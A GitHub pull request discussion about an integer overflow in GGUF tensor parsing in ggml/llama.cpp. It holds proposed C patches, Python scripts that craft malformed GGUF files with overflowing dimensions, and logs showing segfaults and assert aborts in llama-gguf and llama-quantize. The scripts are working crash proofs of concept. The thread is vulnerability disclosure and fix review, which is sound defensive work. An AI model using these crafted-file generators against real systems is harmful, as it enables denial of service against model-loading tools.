Skip to content

Fix integer overflow in GGUF tensor parsing#18674

Closed
alexanderkent wants to merge 2 commits intoggml-org:masterfrom
alexanderkent:fix/heap-overflow-gguf
Closed

Fix integer overflow in GGUF tensor parsing#18674
alexanderkent wants to merge 2 commits intoggml-org:masterfrom
alexanderkent:fix/heap-overflow-gguf

Conversation

@alexanderkent
Copy link
Copy Markdown

This PR addresses a heap buffer overflow vulnerability caused by integer overflow in ggml_nbytes during GGUF tensor parsing.

Changes:

  • ggml/src/ggml.c: Added ggml_nbytes_safe() with checked arithmetic that returns SIZE_MAX on overflow.
  • ggml/src/gguf.cpp: Added strict validation in gguf_init_from_file_impl to reject tensors where byte size overflows.
  • ggml/include/ggml.h: Declared ggml_nbytes_safe() API.

Impact:
Prevents heap-based buffer overflow where ggml_nbytes wraps around due to integer overflow. Mitigates potential RCE via malicious GGUF files.

This PR addresses a heap buffer overflow vulnerability caused by integer overflow in ggml_nbytes during GGUF tensor parsing.

Changes:
- ggml/src/ggml.c: Added ggml_nbytes_safe() with checked arithmetic that returns SIZE_MAX on overflow.
- ggml/src/gguf.cpp: Added strict validation in gguf_init_from_file_impl to reject tensors where byte size overflows.
- ggml/include/ggml.h: Declared ggml_nbytes_safe() API.

Impact:
Prevents heap-based buffer overflow where ggml_nbytes wraps around due to integer overflow. Mitigates potential RCE via malicious GGUF files.
@JohannesGaessler
Copy link
Copy Markdown
Contributor

Mitigates potential RCE via malicious GGUF files.

How would one do that? Was "AI" used for this PR?

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

Let's not be alarmist here. It would be helpful to publish the malformed GGUF example. This is a buffer overflow, not an RCE (the R stands for Remote), and turning it into a genuine ACE (Arbitrary Code Execution: Local exploit) would require significant expertise and bypassing modern OS protections (ASLR, DEP/NX, stack canaries, etc.). So let's fix this local buffer overflow in a minimalist way :) I tested the patch, no regressions, but I think we can make it simpler.

@github-actions github-actions Bot added the ggml changes relating to the ggml tensor library for machine learning label Jan 7, 2026
Copy link
Copy Markdown
Contributor

@JohannesGaessler JohannesGaessler left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This PR is needlessly complicated, we already have a check that the number of elements is representable as int64_t, it's enough to just do an equivalent check afterwards for the size in bytes and size_t. Also add a corresponding test to test-gguf.cpp. I don't see how a potential overflow in ggml_nbytes could be exploited in terms of security.

Removed redundant inline overflow checks from stride calculations.
The ggml_nbytes_safe() call before allocation handles all overflow
scenarios, making the earlier checks unnecessary.
@ServeurpersoCom
Copy link
Copy Markdown
Contributor

ServeurpersoCom commented Jan 7, 2026

Like this one ?

(root|~/llama.cpp.pascal) git diff 86ec8a55964de893229209b320367a461d03eb86
diff --git a/ggml/src/ggml.c b/ggml/src/ggml.c
index 09b8eb466..7845c2cb2 100644
--- a/ggml/src/ggml.c
+++ b/ggml/src/ggml.c
@@ -1235,6 +1235,26 @@ int64_t ggml_nrows(const struct ggml_tensor * tensor) {
     return tensor->ne[1]*tensor->ne[2]*tensor->ne[3];
 }

+static inline bool ggml_size_add_overflow(size_t a, size_t b, size_t * result) {
+    if (a > SIZE_MAX - b) {
+        return true;
+    }
+    *result = a + b;
+    return false;
+}
+
+static inline bool ggml_size_mul_overflow(size_t a, size_t b, size_t * result) {
+    if (a == 0 || b == 0) {
+        *result = 0;
+        return false;
+    }
+    if (a > SIZE_MAX / b) {
+        return true;
+    }
+    *result = a * b;
+    return false;
+}
+
 size_t ggml_nbytes(const struct ggml_tensor * tensor) {
     for (int i = 0; i < GGML_MAX_DIMS; ++i) {
         if (tensor->ne[i] <= 0) {
@@ -1247,13 +1267,25 @@ size_t ggml_nbytes(const struct ggml_tensor * tensor) {
     if (blck_size == 1) {
         nbytes = ggml_type_size(tensor->type);
         for (int i = 0; i < GGML_MAX_DIMS; ++i) {
-            nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
+            size_t add;
+            if (ggml_size_mul_overflow((size_t) (tensor->ne[i] - 1), tensor->nb[i], &add) ||
+                ggml_size_add_overflow(nbytes, add, &nbytes)) {
+                GGML_ABORT("%s: tensor byte size overflow", __func__);
+            }
         }
     }
     else {
-        nbytes = tensor->ne[0]*tensor->nb[0]/blck_size;
+        size_t base;
+        if (ggml_size_mul_overflow((size_t) tensor->ne[0], tensor->nb[0], &base)) {
+            GGML_ABORT("%s: tensor byte size overflow", __func__);
+        }
+        nbytes = base / blck_size;
         for (int i = 1; i < GGML_MAX_DIMS; ++i) {
-            nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
+            size_t add;
+            if (ggml_size_mul_overflow((size_t) (tensor->ne[i] - 1), tensor->nb[i], &add) ||
+                ggml_size_add_overflow(nbytes, add, &nbytes)) {
+                GGML_ABORT("%s: tensor byte size overflow", __func__);
+            }
         }
     }

This patch just adds two inline helpers that check if multiplication or addition would overflow before doing them, then aborts cleanly if they would: keeps it surgical in ggml_nbytes() without touching anything else.

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

I'm checking I think we can make it even simpler, earlier in the loader !!!!

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

ServeurpersoCom commented Jan 7, 2026

We can do it here, with the other checks :

diff --git a/ggml/src/gguf.cpp b/ggml/src/gguf.cpp
index b165d8bdc..5cd11ba46 100644
--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,16 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
+            const uint64_t ne_total = (uint64_t)info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            const uint64_t bytes_total = ne_total * type_size / blck_size;
+            if (bytes_total > SIZE_MAX) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow (%" PRIu64 " bytes > SIZE_MAX)\n",
+                    __func__, info.t.name, bytes_total);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);

@JohannesGaessler
Copy link
Copy Markdown
Contributor

Just check whether ggml_nelements(...)/ggml_blck_size(...) <= SIZE_MAX/ggml_type_size(...), the variant you have is more susceptible to overflows.

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

Yes! divides before multiplying to avoid intermediate overflow in the calculation itself :

--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,15 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
+            const int64_t ne_total = info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            if (blck_size > 0 && (uint64_t)ne_total / blck_size > SIZE_MAX / type_size) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow\n",
+                    __func__, info.t.name);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

ServeurpersoCom commented Jan 7, 2026

(.venv) (root|~/evil) ls
bof3d.py  gemma-3-1b-it-Q8_0.gguf
(.venv) (root|~/evil) nano bof2d.py
(.venv) (root|~/evil) nano bof2d.py
(.venv) (root|~/evil) python3 bof2d.py gemma-3-1b-it-Q8_0.gguf bof-gemma-3-1b-it-Q8_0.gguf
Target tensor #1: token_embd.weight
Original shape: [  1152 262144]
GGUF v3
Patched dim[1]: 262144 -> 4398046511105 (2^42+1)
This triggers: (2^42) * stride = 2^64 overflow wrap to 0
Created: bof-gemma-3-1b-it-Q8_0.gguf (1069306400 bytes)
(.venv) (root|~/evil) ../llama.cpp.pascal/build/bin/llama-cli --model ~/evil/bof-gemma-3-1b-it-Q8_0.gguf -n 1 -p "test"
ggml_cuda_init: found 1 CUDA devices:
  Device 0: NVIDIA RTX PRO 6000 Blackwell Workstation Edition, compute capability 12.0, VMM: yes

Loading model... |gguf_init_from_file_impl: tensor 'blk.0.attn_k.weight' has offset 320868864, expected 5383208929597152
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from /root/evil/bof-gemma-3-1b-it-Q8_0.gguf
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
gguf_init_from_file_impl: tensor 'blk.0.attn_k.weight' has offset 320868864, expected 5383208929597152
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from /root/evil/bof-gemma-3-1b-it-Q8_0.gguf
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model '/root/evil/bof-gemma-3-1b-it-Q8_0.gguf'
srv    load_model: failed to load model, '/root/evil/bof-gemma-3-1b-it-Q8_0.gguf'
Failed to load the model
(.venv) (root|~/evil)

has offset 320868864, expected 5383208929597152

I reproduced -> It's a clean exit !

(.venv) (root|~/evil) cat bof2d.py
#!/usr/bin/env python3
import sys
from gguf import GGUFReader
import struct

def patch_gguf_overflow(input_file, output_file):
    # Parse GGUF
    reader = GGUFReader(input_file)
    tensors = list(reader.tensors)

    # Find first tensor with 2+ dimensions
    target_idx = None
    for i, t in enumerate(tensors):
        if len(t.shape) >= 2:
            target_idx = i
            break

    if target_idx is None:
        print("ERROR: no tensor with 2+ dimensions found")
        return

    target = tensors[target_idx]
    dim_idx = 1  # Patch dimension 1 for 2D tensors

    print(f"Target tensor #{target_idx}: {target.name}")
    print(f"Original shape: {target.shape}")

    # Load file
    with open(input_file, 'rb') as f:
        data = bytearray(f.read())

    # Parse header
    version = struct.unpack('<I', data[4:8])[0]
    print(f"GGUF v{version}")

    # Find tensor by name
    target_name = target.name.encode('utf-8')
    name_offset = data.find(struct.pack('<Q', len(target_name)) + target_name, 1000)

    if name_offset == -1:
        print("ERROR: tensor not found")
        return

    # Parse tensor header
    offset = name_offset
    name_len = struct.unpack('<Q', data[offset:offset+8])[0]
    offset += 8 + name_len
    n_dims = struct.unpack('<I', data[offset:offset+4])[0]
    offset += 4

    if dim_idx >= n_dims:
        print(f"ERROR: dim_idx {dim_idx} >= n_dims {n_dims}")
        return

    # Patch dimension with 2^42 + 1
    evil_value = 4398046511105
    patch_offset = offset + (dim_idx * 8)
    old_val = struct.unpack('<Q', data[patch_offset:patch_offset+8])[0]
    struct.pack_into('<Q', data, patch_offset, evil_value)

    print(f"Patched dim[{dim_idx}]: {old_val} -> {evil_value} (2^42+1)")
    print(f"This triggers: (2^42) * stride = 2^64 overflow wrap to 0")

    # Write
    with open(output_file, 'wb') as f:
        f.write(data)

    print(f"Created: {output_file} ({len(data)} bytes)")

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python3 bof.py input.gguf [output.gguf]")
        sys.exit(1)

    patch_gguf_overflow(
        sys.argv[1],
        sys.argv[2] if len(sys.argv) > 2 else 'evil_' + sys.argv[1].split('/')[-1]
    )
(.venv) (root|~/evil)

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

ServeurpersoCom commented Jan 7, 2026

OK I need to patch a model with a 3D or 4D tensor?

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

ServeurpersoCom commented Jan 7, 2026

Even the MoE have 3D, I didn't notice LLM with 4D tensors

(.venv) (root|~/evil) python3 bof4d.py Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf bof-qwen.gguf
ERROR: no tensor with 4 dimensions found
(.venv) (root|~/evil) python3 << 'EOF'
from gguf import GGUFReader
r = GGUFReader('Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf')
shapes = {}
for t in r.tensors:
    ndim = len(t.shape)
    if ndim not in shapes:
        shapes[ndim] = []
    shapes[ndim].append((t.name, t.shape))

for ndim in sorted(shapes.keys()):
    print(f"\n{ndim}D tensors: {len(shapes[ndim])}")
    for name, shape in shapes[ndim][:3]:
        print(f"  {name}: {shape}")
EOF

1D tensors: 193
  output_norm.weight: [2048]
  blk.0.attn_k_norm.weight: [128]
  blk.0.attn_norm.weight: [2048]

2D tensors: 242
  output.weight: [  2048 151936]
  token_embd.weight: [  2048 151936]
  blk.0.attn_k.weight: [2048  512]

3D tensors: 144
  blk.0.ffn_down_exps.weight: [ 768 2048  128]
  blk.0.ffn_gate_exps.weight: [2048  768  128]
  blk.0.ffn_up_exps.weight: [2048  768  128]
(.venv) (root|~/evil) ls
bof2d.py  bof3d.py  bof4d.py  Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf
(.venv) (root|~/evil) python3 bof3d.py Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf bof-qwen.gguf
Target tensor #10: blk.0.ffn_down_exps.weight
Original shape: [ 768 2048  128]
GGUF v3
Patched dim[2]: 128 -> 4398046511105 (2^42+1)
This triggers: (2^42) * stride = 2^64 overflow wrap to 0
Created: bof-qwen.gguf (35989944736 bytes)
(.venv) (root|~/evil) ../llama.cpp.pascal/build/bin/llama-cli --model bof-qwen.gguf -n 1 -p "test"
ggml_cuda_init: found 1 CUDA devices:
  Device 0: NVIDIA RTX PRO 6000 Blackwell Workstation Edition, compute capability 12.0, VMM: yes

Loading model... -gguf_init_from_file_impl: tensor 'blk.0.ffn_gate_exps.weight' has offset 1677214720, expected 13835058056559870976
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from bof-qwen.gguf
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
gguf_init_from_file_impl: tensor 'blk.0.ffn_gate_exps.weight' has offset 1677214720, expected 13835058056559870976
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from bof-qwen.gguf
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model 'bof-qwen.gguf'
srv    load_model: failed to load model, 'bof-qwen.gguf'
Failed to load the model
(.venv) (root|~/evil)

it's a clean exit, master without patch, no buffer overflow, this clean exit does not invalidate the arithmetic issue itself. My repro only patches an existing GGUF and therefore fails early on offset validation; reaching the ggml_nbytes overflow would likely require generating a fully coherent GGUF from scratch.

@ngxson
Copy link
Copy Markdown
Contributor

ngxson commented Jan 8, 2026

Prevents heap-based buffer overflow where ggml_nbytes wraps around due to integer overflow. Mitigates potential RCE via malicious GGUF files.

Could you provide a working PoC for such attack?

@alexanderkent
Copy link
Copy Markdown
Author

Prevents heap-based buffer overflow where ggml_nbytes wraps around due to integer overflow. Mitigates potential RCE via malicious GGUF files.

Could you provide a working PoC for such attack?

Worst-case scenario (realistic):
Crash/DoS: Most likely outcome - process segfaults when accessing unmapped memory.
Information disclosure: Possible if attacker can influence what's read from heap
Code execution: Theoretically possible but requires: (1) heap feng shui to position controlled data, (2) bypassing ASLR/DEP/NX/stack canaries, (3) finding usable gadgets...

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

Repro input would really help here. For GGUF parsing (or any file/param input) issues, I think we should require at least a minimal crashing sample (DoS-level, shared privately with maintainers (?)). That allows us to add a regression test and validate a minimal fix (crash before -> no crash after) instead of discussing theoretical exploitability. I can test any provided samples in a hardened VM on a dedicated machine without problem!

@alexanderkent
Copy link
Copy Markdown
Author

Repro input would really help here. For GGUF parsing (or any file/param input) issues, I think we should require at least a minimal crashing sample (DoS-level, shared privately with maintainers (?)). That allows us to add a regression test and validate a minimal fix (crash before -> no crash after) instead of discussing theoretical exploitability. I can test any provided samples in a hardened VM on a dedicated machine without problem!

I've attached overflow_poc.gguf.zip (112 bytes) - a minimal GGUF file with crafted dimensions that trigger integer overflow in ggml_nbytes.

To reproduce:

# Checkout pre-fix commit
git checkout ef83fb860
# Build with ASAN (optional, for clearer output)
cmake -B build -DLLAMA_SANITIZE_ADDRESS=ON
cmake --build build --target llama-gguf -j
# Test
./build/bin/llama-gguf overflow_poc.gguf r

Expected (unfixed):

tensor[0]: size = 4194304   ← wrapped from ~18 EB
zsh: segmentation fault
overflow_poc gguf

overflow_poc.gguf.zip

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

it's interesting now :

(.venv) (root|~/A) python3 << 'EOF'
from gguf import GGUFReader
try:
    r = GGUFReader('overflow_poc.gguf')
    print(f"Tensors: {len(r.tensors)}")
    for t in r.tensors:
        print(f"  {t.name}: {t.shape} type={t.tensor_type}")
except Exception as e:
    print(f"Error: {e}")
EOF
Error: cannot reshape array of size 4 into shape (1,4398046511105,1024,1024)

(.venv) (root|~/A) /root/llama.cpp.pascal/build/bin/llama-gguf overflow_poc.gguf r
gguf_ex_read_0: version:      3
gguf_ex_read_0: alignment:   32
gguf_ex_read_0: data offset: 96
gguf_ex_read_0: n_kv: 0
gguf_ex_read_0: find key: some.parameter.string not found.
gguf_ex_read_0: n_tensors: 1
gguf_ex_read_0: tensor[0]: name = overflow_tensor, size = 4194304, offset = 0
gguf_init_from_file_impl: failed to read tensor data binary blob
Erreur de segmentation

(.venv) (root|~/A) /root/llama.cpp.pascal/build/bin/llama-cli -m overflow_poc.gguf
ggml_cuda_init: found 1 CUDA devices:
  Device 0: NVIDIA RTX PRO 6000 Blackwell Workstation Edition, compute capability 12.0, VMM: yes

Loading model... |llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model 'overflow_poc.gguf'
srv    load_model: failed to load model, 'overflow_poc.gguf'
Failed to load the model
(.venv) (root|~/A)

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

ServeurpersoCom commented Jan 8, 2026

With minimized patch :

(.venv) (root|~/llama.cpp.pascal) cat overflow.patch
--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,15 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
+            const int64_t ne_total = info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            if (blck_size > 0 && (uint64_t)ne_total / blck_size > SIZE_MAX / type_size) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow\n",
+                    __func__, info.t.name);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);
(.venv) (root|~/llama.cpp.pascal) ./build/bin/llama-gguf ../A/overflow_poc.gguf r
gguf_init_from_file_impl: tensor 'overflow_tensor' size overflow
gguf_init_from_file_impl: failed to read tensor info
gguf_ex_read_0: failed to load '../A/overflow_poc.gguf'
/root/llama.cpp.pascal/examples/gguf/gguf.cpp:265: GGML_ASSERT(gguf_ex_read_0(fname) && "failed to read gguf file") failed
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x00007fa3cfef1bd3 in __GI___wait4 (pid=719270, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      ../sysdeps/unix/sysv/linux/wait4.c: Aucun fichier ou dossier de ce type.
#0  0x00007fa3cfef1bd3 in __GI___wait4 (pid=719270, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      in ../sysdeps/unix/sysv/linux/wait4.c
#1  0x00007fa3d034b71b in ggml_print_backtrace () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#2  0x00007fa3d034b86e in ggml_abort () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#3  0x0000563b7356f5e6 in main ()
[Inferior 1 (process 719269) detached]
Abandon
(.venv) (root|~/llama.cpp.pascal)

BEFORE:

  • llama-gguf: segfault (nbytes wrapped to 4MB instead of 18EB)
  • llama-cli: vague "data not within file bounds" (but NOT a BOF/DoS!)

AFTER:

  • llama-gguf: clean abort with "size overflow"
  • llama-cli: explicit "size overflow" message

9-line fix catches overflow early in loader, prevents segfault in llama-gguf and clarifies error in llama-cli

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

A working python generator to document/test :


(root|~/A) cat gen.py
#!/usr/bin/env python3
import struct
import sys

def generate_overflow_poc(output='overflow_poc.gguf'):
    """
    Generate minimal GGUF with integer overflow trigger.

    Tensor: [1024, 1024, 2^42+1, 1] shape causes:
      nb[2] = 4MB * 1024 = 4GB (2^22)
      (ne[2]-1) * nb[2] = 2^42 * 2^22 = 2^64 -> wraps to 0
    Result: ggml_nbytes() returns 4MB instead of 18 EB
    """

    data = bytearray()

    # Header
    data += b'GGUF'                          # magic
    data += struct.pack('<I', 3)             # version 3
    data += struct.pack('<Q', 1)             # tensor_count
    data += struct.pack('<Q', 0)             # metadata_count

    # Tensor info
    name = b'overflow_tensor'
    data += struct.pack('<Q', len(name))     # name_len
    data += name                             # name

    # Dimensions: [1024, 1024, 2^42+1, 1]
    data += struct.pack('<I', 4)             # n_dims
    data += struct.pack('<Q', 1024)          # ne[0]
    data += struct.pack('<Q', 1024)          # ne[1]
    data += struct.pack('<Q', 4398046511105) # ne[2] = 2^42 + 1
    data += struct.pack('<Q', 1)             # ne[3]

    # Type F32 (0) + offset
    data += struct.pack('<I', 0)             # type
    data += struct.pack('<Q', 0)             # offset = 0

    # Alignment padding to 32-byte boundary (0x60 = 96 bytes)
    while len(data) < 96:
        data += b'\x00'

    # Tensor data (deadbeef pattern - 16 bytes total)
    data += b'\xde\xad\xbe\xef' * 4          # 16 bytes of deadbeef

    with open(output, 'wb') as f:
        f.write(data)

    print(f"Generated {output} ({len(data)} bytes)")
    print(f"  Tensor: overflow_tensor")
    print(f"  Shape: [1024, 1024, 4398046511105, 1]")
    print(f"  Expected: 18 EB")
    print(f"  Wrapped: ~4 MB")

if __name__ == '__main__':
    output = sys.argv[1] if len(sys.argv) > 1 else 'overflow_poc.gguf'
    generate_overflow_poc(output)
(root|~/A) python3 gen.py
Generated overflow_poc.gguf (112 bytes)
  Tensor: overflow_tensor
  Shape: [1024, 1024, 4398046511105, 1]
  Expected: 18 EB
  Wrapped: ~4 MB
(root|~/A) xxd overflow_poc_original.gguf
00000000: 4747 5546 0300 0000 0100 0000 0000 0000  GGUF............
00000010: 0000 0000 0000 0000 0f00 0000 0000 0000  ................
00000020: 6f76 6572 666c 6f77 5f74 656e 736f 7204  overflow_tensor.
00000030: 0000 0000 0400 0000 0000 0000 0400 0000  ................
00000040: 0000 0001 0000 0000 0400 0001 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: dead beef dead beef dead beef dead beef  ................
(root|~/A) xxd overflow_poc.gguf
00000000: 4747 5546 0300 0000 0100 0000 0000 0000  GGUF............
00000010: 0000 0000 0000 0000 0f00 0000 0000 0000  ................
00000020: 6f76 6572 666c 6f77 5f74 656e 736f 7204  overflow_tensor.
00000030: 0000 0000 0400 0000 0000 0000 0400 0000  ................
00000040: 0000 0001 0000 0000 0400 0001 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: dead beef dead beef dead beef dead beef  ................
(root|~/A)

And tested patch : ServeurpersoCom@c503651

@ngxson
Copy link
Copy Markdown
Contributor

ngxson commented Jan 8, 2026

@alexanderkent I don't think the PoC is valid as-is, because you are intentionally using llama-gguf

When running with llama-server or llama-cli, it exits cleanly:

srv    load_model: loading model '../../Downloads/overflow_poc.gguf'
common_init_result: fitting params to device memory, for bugs during this step try to reproduce them with -fit off, or provide --verbose logs if the bug only occurs with -fit on
llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
llama_params_fit: fitting params to free memory took 0.00 seconds
llama_model_load_from_file_impl: using device Metal (Apple M3 Max) (unknown id) - 27647 MiB free
llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model '../../Downloads/overflow_poc.gguf'
srv    load_model: failed to load model, '../../Downloads/overflow_poc.gguf'
srv    operator(): operator(): cleaning up before exit...
main: exiting due to model loading error

I don't believe this is a valid vulnerability in GGUF or GGML library. It's just the downstream code misses the check for boundary. llama.cpp has such check, but llama-gguf doesn't have because it's a tool for debugging and testing, not for normal usage. We can add the check easily though.

@ngxson
Copy link
Copy Markdown
Contributor

ngxson commented Jan 9, 2026

Closing because this is not a valid bug in GGML or libllama

@ngxson ngxson closed this Jan 9, 2026
@JohannesGaessler
Copy link
Copy Markdown
Contributor

I would consider it a valid bug in gguf.cpp and I will review and approve a PR that adds a simple and self-contained check in gguf.cpp along with a corresponding test case in test-gguf.cpp.

@alexanderkent
Copy link
Copy Markdown
Author

Thanks everyone for looking into this.

I respectfully disagree with closing this. Here's proof that the vulnerability affects production llama.cpp tools, not just debug tools:

Dimensions: [2147483648, 2147483648, 1, 1] (2^31 × 2^31)
Element count: 2^62 < INT64_MAX ✓ (passes element check)
Byte size: 2^64 > SIZE_MAX ✗ (overflows, causing allocation failure)

overflow_poc_friday.gguf.zip

Reproduction with llama-quantize (production tool)

# Build unfixed code with ASAN
git checkout ef83fb860
cmake -B build -DLLAMA_SANITIZE_ADDRESS=ON
cmake --build build --target llama-quantize -j

# Run PoC
./build/bin/llama-quantize overflow_poc_friday.gguf out.gguf Q4_0
llama-quantize

llama_model_loader: llama.vocab_size u32 = 2147483648
/src/llama-model-loader.cpp:912: GGML_ASSERT(cur->data != nullptr) failed
zsh: abort

Potential Root Cause

ggml_nbytes() in the GGML library overflows when calculating tensor size, returning 0 or a very small value. This causes:

  • Downstream code to allocate 0 bytes (or fail allocation)
  • NULL pointer dereference when accessing tensor data

The fix (ggml_nbytes_safe()) should likely be in the core library because:

  • Multiple production tools are affected (llama-quantize, llama-gguf) ( The existing bound check in llama-model-loader.h:41 uses ggml_nbytes() which returns the already-corrupted value — making the check ineffective
  • Any future tool using gguf_init_from_file() would inherit this vulnerability

@ServeurpersoCom
Copy link
Copy Markdown
Contributor

I can reproduce with llama-quantize, though I understand there may be debate about whether this tool qualifies as a production utility or primarily a debugging tool.

(root|~/A) ./test_exploit.sh
[*] Testing with ASAN build...
main: build = 7749 (a75fd08e7)
main: built with GNU 12.2.0 for Linux x86_64
main: quantizing '/root/A/overflow_poc_friday.gguf' to '/tmp/out.gguf' as Q4_0
llama_model_loader: direct I/O is enabled, disabling mmap
llama_model_loader: loaded meta data with 18 key-value pairs and 1 tensors from /root/A/overflow_poc_friday.gguf (version GGUF V3 (latest))
llama_model_loader: Dumping metadata keys/values. Note: KV overrides do not apply in this output.
llama_model_loader: - kv   0:                       general.architecture str              = llama
llama_model_loader: - kv   1:                               general.name str              = overflow_poc
llama_model_loader: - kv   2:                          llama.block_count u32              = 1
llama_model_loader: - kv   3:                       llama.context_length u32              = 2048
llama_model_loader: - kv   4:                     llama.embedding_length u32              = 2147483648
llama_model_loader: - kv   5:                 llama.attention.head_count u32              = 32
llama_model_loader: - kv   6:              llama.attention.head_count_kv u32              = 32
llama_model_loader: - kv   7:                       llama.rope.freq_base f32              = 10000.000000
llama_model_loader: - kv   8:     llama.attention.layer_norm_rms_epsilon f32              = 0.000010
llama_model_loader: - kv   9:                  llama.feed_forward_length u32              = 11008
llama_model_loader: - kv  10:                           llama.vocab_size u32              = 2147483648
llama_model_loader: - kv  11:                       tokenizer.ggml.model str              = llama
llama_model_loader: - kv  12:                      tokenizer.ggml.tokens arr[str,8]       = ["<unk>", "<s>", "</s>", "a", "b", "c...
llama_model_loader: - kv  13:                      tokenizer.ggml.scores arr[f32,8]       = [0.000000, 0.000000, 0.000000, 0.0000...
llama_model_loader: - kv  14:                  tokenizer.ggml.token_type arr[u32,8]       = [0, 0, 0, 0, 0, 0, 0, 0]
llama_model_loader: - kv  15:                tokenizer.ggml.bos_token_id u32              = 1
llama_model_loader: - kv  16:                tokenizer.ggml.eos_token_id u32              = 2
llama_model_loader: - kv  17:            tokenizer.ggml.unknown_token_id u32              = 0
llama_model_loader: - type  f32:    1 tensors
/root/llama.cpp.pascal/src/llama-model-loader.cpp:945: GGML_ASSERT(cur->data != nullptr) failed
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x00007fd5c54f1bd3 in __GI___wait4 (pid=959807, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      ../sysdeps/unix/sysv/linux/wait4.c: Aucun fichier ou dossier de ce type.
#0  0x00007fd5c54f1bd3 in __GI___wait4 (pid=959807, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      in ../sysdeps/unix/sysv/linux/wait4.c
#1  0x00007fd5cb87d6ff in __interceptor_waitpid (pid=<optimized out>, status=0x0, options=<optimized out>) at ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:2518
2518    ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc: Aucun fichier ou dossier de ce type.
#2  0x00007fd5ca8a0aa4 in ggml_print_backtrace () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#3  0x00007fd5ca8a0d7b in ggml_abort () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#4  0x00007fd5cb1c2c6a in llama_model_loader::load_data_for(ggml_tensor*) const () from /root/llama.cpp.pascal/build/bin/libllama.so.0
